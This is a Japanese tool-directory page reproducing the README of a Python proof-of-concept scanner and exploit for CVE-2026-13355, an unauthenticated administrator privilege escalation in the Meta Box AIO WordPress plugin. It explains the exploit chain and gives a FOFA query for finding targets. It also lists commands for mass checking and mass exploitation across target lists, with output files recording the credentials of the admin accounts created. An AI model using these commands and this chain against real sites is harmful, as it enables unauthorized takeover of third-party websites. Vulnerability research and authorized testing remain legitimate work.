Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-13355 — CVE-2026-13355(Meta Box AIO WordPressプラグインにおける未認証の管理者権限昇格)に対応したPython製PoCスキャナおよびエクスプロイト。FOFAによる大量スキャン機能付き。 | Kitploit
ツール/GitHubGitHub/murrez/cve-2026-13355
特権昇格偵察脆弱性スキャナーエクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubmurrez/cve-2026-13355

CVE-2026-13355

CVE-2026-13355(Meta Box AIO WordPressプラグインにおける未認証の管理者権限昇格)に対応したPython製PoCスキャナおよびエクスプロイト。FOFAによる大量スキャン機能付き。

31日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-13355 — Meta Box AIO 未認証管理者権限昇格

WordPressバンドル Meta Box AIO(および関連する MB Frontend Submission / MB User Profile 拡張機能)における CVE-2026-13355 のPython 3による概念実証 スキャナーおよびエクスプロイト。

プラットフォームWordPressプラグイン
コンポーネントMeta Box AIO
影響を受けるバージョンMeta Box AIO ≤ 3.11.0; MB Frontend Submission ≤ 4.5.6; MB User Profile ≤ 3.11.0
修正バージョンMeta Box AIO 3.12.0+(Form::process() の認可)
CVSS9.8 Critical
認証未認証
CWECWE-269 — 不適切な権限管理
研究者h0xilo (Wordfence)

概要

2つのバンドル拡張機能における連鎖的な脆弱性により、未認証での 管理者 アカウント作成が可能になります:

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id が認証なしでフォームのターゲットを上書きします;Form::process() は user_can_edit() を省略しているため、攻撃者は wp_update_post() を実行し、任意の投稿/ページの post_content を上書きできます。
  2. MB User Profile (mbup) — 注入された [mb_user_profile_register role="administrator" auto_login="true"] ショートコード属性が、ロール検証なしで信頼されます。

重要: エクスプロイトチェーンには公開された mbfs(フロントエンド送信)フォームが必要であり、ログイン専用の mbup フォームでは動作しません。多くのFOFAヒットは mbup のログイン/登録UIのみを公開しており、これらは plugin_mbup_only としてフラグが立てられ、このチェーンでは悪用できません。

要件

  • Python 3.8+
  • pip install -r requirements.txt

クイックスタート

root@kitploit:~
pip install -r requirements.txt

# Single target — check (live terminal flow by default)
python poc.py -u https://target.example --mode check

# Mass check (one line per target unless --quiet)
python poc.py --list targets.example.txt --mode check --threads 20

# Single target — exploit (needs mbfs form URL + post ID)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → ターゲットリスト

クエリ例:

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

FOFA CSVエクスポートを正規化:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# writes list.txt + normalized CSV (local only, gitignored)
python poc.py --list list.txt --mode check --threads 20

CLIオプション

出力ファイル

エクスプロイト実行時には --vuln-list exploited.txt を使用して、hits.txt 内のチェックヒットが上書きされないようにしてください。

チェックの status 値

エクスプロイトに関する注意

  • ポイズン(汚染)ステップでは、mbfs フォームを通じて ?rwmb_frontend_field_object_id=<id> を付けて post_content をPOSTします。
  • 成功するには、注入されたショートコードが汚染されたページで レンダリング される必要があります(strip/KSESなし、プラグイン未修正、正しいフォームタイプ)。
  • お問い合わせ/ニュースレターの mbfs フォームには実際の post_content フィールドがないことが多く、実際には上書きが失敗する可能性があります。
  • POST時のHTTP 403 は通常、WAF/ホストによるブロックを示します。

リポジトリ構成

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

ローカルスキャンリストと実行アーティファクト(list.txt、fofa*.csv、*.jsonl、hits*.txt など)は .gitignore に含まれており、コミットしないでください。

参考資料

  • NVD — CVE-2026-13355
  • Wordfence advisory
  • Meta Box AIO changelog

法的注意

許可されたセキュリティテストおよび教育 のみを目的としています。適用される法律およびプログラム規則の遵守はあなたの責任です。

ツールをダウンロード
オプション説明
-u, --url単一のベースURL
--listURLリスト、FOFA正規化CSV(url 列)、または candidates.jsonl
--modecheck または exploit
--form-url[mb_frontend_form ...] / mbfs-form を含むページ
--object-idrwmb_frontend_field_object_id 用の投稿/ページID
--pathsフロントエンドフォームをクロールする追加パス
--username, --email, --password登録資格情報(エクスプロイト)
--shortcode注入する post_content ペイロード(デフォルトは管理者登録ショートコード)
--verify登録後に /wp-admin/ または wp-login.php で確認
--flow一括実行時にターゲットごとに1行をストリーム出力(--list 指定時のデフォルト)
--no-flow進捗サマリーのみ
--quiet, -q最小限のコンソール出力
--threads, -j一括同時実行数(デフォルト15)
--outputJSONLログ(デフォルト cve_2026_13355_results.jsonl)
--vuln-listテキストヒット / 悪用済み行(デフォルト hits.txt / エクスプロイト時は exploited.txt を使用)
--candidates-listチェックメタデータJSONL(デフォルト candidates.jsonl)
ファイルモード内容
cve_2026_13355_results.jsonl両方ターゲットごとの完全なJSON
hits.txtcheckcandidate_mbfs のURL
candidates.jsonlcheckform_url、object_id、バージョンヒント
exploited.txtexploiturl|user|email|pass|oid=…
ステータス意味
candidate_mbfsプラグインが存在し、MB Frontend Submission フォームが発見された(悪用可能な可能性あり)
plugin_mbup_onlyUser Profileのログイン/登録フォームのみ — このCVEチェーンでは ない
plugin_no_frontend_formsプラグインのフィンガープリントはあるが、rwmbフロントエンドフォームが発見されなかった
patched影響を受ける範囲を超えるバージョン(読み取り可能な場合)
no_pluginMeta Box AIO / 拡張機能が検出されなかった